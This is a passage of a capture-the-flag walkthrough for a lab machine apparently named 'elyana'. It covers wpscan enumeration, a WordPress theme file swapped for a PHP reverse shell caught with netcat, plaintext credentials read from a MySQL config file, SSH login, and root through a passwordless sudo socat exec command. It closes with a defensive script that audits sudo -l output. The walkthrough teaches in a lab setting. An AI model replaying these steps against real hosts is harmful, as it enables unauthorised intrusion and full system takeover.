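    return plain.split(" ", 1)[1] if plain.startswith("Try ") else plain


if __name__ == "__main__":
    print(vigenere(CIPHERTEXT, KEY))  # Try H@ckme@123
    print(recover_password())         # H@ckme@123
```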

Save this text and go back to WordPress.

[screenshot: wp]

I see a name here, elyana, which could well be the username too.

Use wpscan to dig into this site.

┌──(kalikali)-[~]
└─$ wpscan --url http://10.10.68.232/wordpress/ -e vp,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://10.10.68.232/wordpress/ [10.10.68.232]
[+] Started: Thu Nov 17 02:31:59 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.68.232/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.68.232/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.68.232/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.68.232/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.68.232/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://10.10.68.232/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://10.10.68.232/wordpress/wp-content/themes/twentytwenty/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://10.10.68.232/wordpress/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://10.10.68.232/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.68.232/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:02 <===============================================================================================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] elyana
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.68.232/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

From the output above I have a WordPress 5.5.1 install using an outdated twentytwenty theme; that is worth noting as a possible route to RCE once I can log in to WordPress.

Next, the user elyana, just as I guessed above. So I will try logging in to WordPress with the username elyana and the text I just recovered as the password.

It works with elyana - H@ckme@123. I open the twentytwenty theme in the editor, edit it with my PHP shell, change the IP address and port to my machine's, and update the file.

[screenshot: get shell]

Then start a listener with netcat: nc -lnvp 2402

Visit the link: http://10.10.183.28/wordpress/wp-content/themes/twentytwenty/404.php

┌──(kalikali)-[~]
└─$ nc -lnvp 2402                
listening on [any] 2402 ...
connect to [10.6.0.191] from (UNKNOWN) [10.10.183.28] 54774
Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 09:00:05 up 26 min,  0 users,  load average: 0.00, 0.02, 0.29
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

SSH

$ cd /home
$ ls
elyana
$ cd /home/elyana
$ ls
hint.txt
user.txt
$ cat user.txt
cat: user.txt: Permission denied
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cat hint.txt
Elyana's user password is hidden in the system. Find it ;)
$ 
$ find / -type f -user elyana 2>/dev/null
/home/elyana/user.txt
/home/elyana/.bash_logout
/home/elyana/hint.txt
/home/elyana/.bash_history
/home/elyana/.profile
/home/elyana/.sudo_as_admin_successful
/home/elyana/.bashrc
/etc/mysql/conf.d/private.txt
$ cat /etc/mysql/conf.d/private.txt
user: elyana
password: E@syR18ght
$ 

Try logging in over SSH as elyana.

┌──(kalikali)-[~]
└─$ ssh elyana@10.10.183.28
The authenticity of host '10.10.183.28 (10.10.183.28)' can't be established.
ED25519 key fingerprint is SHA256:Rm7wS3JV0q1IHCuI5dWaanuCoSlTYECCa9jTEE4BFsI.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.183.28' (ED25519) to the list of known hosts.
elyana@10.10.183.28's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-118-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Nov 17 09:11:29 UTC 2022

  System load:  0.07              Processes:           116
  Usage of /:   53.3% of 6.41GB   Users logged in:     0
  Memory usage: 62%               IP address for eth0: 10.10.183.28
  Swap usage:   0%


16 packages can be updated.
0 updates are security updates.


Last login: Fri Oct  9 08:09:56 2020
-bash-4.4$ id
uid=1000(elyana) gid=1000(elyana) groups=1000(elyana),4(adm),27(sudo),108(lxd)
-bash-4.4$ 
-bash-4.4$ ls 
hint.txt  user.txt
-bash-4.4$ 

Privilege escalation

sudo -l

-bash-4.4$ sudo -l
Matching Defaults entries for elyana on elyana:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User elyana may run the following commands on elyana:
    (ALL) NOPASSWD: /usr/bin/socat

socat | GTFOBins: https://gtfobins.github.io/gtfobins/socat/

-bash-4.4$ sudo socat stdin exec:/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
ls /root
root.txt
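The sudoers entry is the whole finding here: NOPASSWD on a binary that can exec a program (socat's exec: address, as GTFOBins documents) is root for anyone holding that account. As an added example (not from the original writeup), this parses `sudo -l` output and flags such entries, so an administrator can audit a fleet of sudoers policies the same way. The list of shell-capable binaries is a hand-picked subset of the GTFOBins catalogue and is illustrative, not exhaustive; the sample output is the one shown above, trimmed of trailing whitespace.

```python
"""sudo -l audit for shell-capable NOPASSWD entries (added example, not from the writeup)."""
from __future__ import annotations

import re

# Hand-picked subset of binaries with a documented way to run a shell or
# arbitrary command (see GTFOBins). Illustrative only, extend as needed.
SHELL_CAPABLE = {
    "socat", "bash", "sh", "dash", "zsh", "vim", "vi", "less", "more",
    "find", "awk", "perl", "python", "python3", "ruby", "env", "tar", "zip",
    "ftp", "gdb", "man", "nc", "ncat", "node", "php", "lua",
}

# "(runas) TAG: TAG: /path/cmd args, /other/cmd"
ENTRY = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")
HEADER = re.compile(r"^User \S+ may run the following commands")


def parse_sudo_l(output: str) -> list[dict]:
    """Return one dict per command in the 'may run' section of `sudo -l` output."""
    entries = []
    in_cmds = False
    for line in output.splitlines():
        if HEADER.match(line):
            in_cmds = True
            continue
        if not in_cmds or not line.strip():
            continue
        m = ENTRY.match(line)
        if not m:
            continue
        tags = [t.strip(": ") for t in m["tags"].split() if t.strip()]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            if cmd:
                entries.append({"runas": m["runas"].strip(), "tags": tags, "cmd": cmd})
    return entries


def risky_entries(entries: list[dict]) -> list[tuple[str, list[str]]]:
    """Flag entries that hand out a shell: ALL, or a shell-capable binary."""
    risky = []
    for e in entries:
        binary = e["cmd"].split()[0].rsplit("/", 1)[-1]
        reasons = []
        if e["cmd"] == "ALL":
            reasons.append("any command allowed")
        elif binary in SHELL_CAPABLE:
            reasons.append(f"{binary} can spawn a shell")
        if not reasons:
            continue
        if "NOPASSWD" in e["tags"]:
            reasons.append("no password required")
        risky.append((e["cmd"], reasons))
    return risky


# The page's sudo -l output, trimmed of trailing whitespace.
SAMPLE = r"""Matching Defaults entries for elyana on elyana:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User elyana may run the following commands on elyana:
    (ALL) NOPASSWD: /usr/bin/socat
"""

if __name__ == "__main__":
    for cmd, reasons in risky_entries(parse_sudo_l(SAMPLE)):
        print(f"{cmd}: {', '.join(reasons)}")
```

A clean result from this audit does not make a policy safe (wildcards, writable target scripts and SETENV all need their own checks), but a hit is always a finding.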



© 2025. All rights reserved.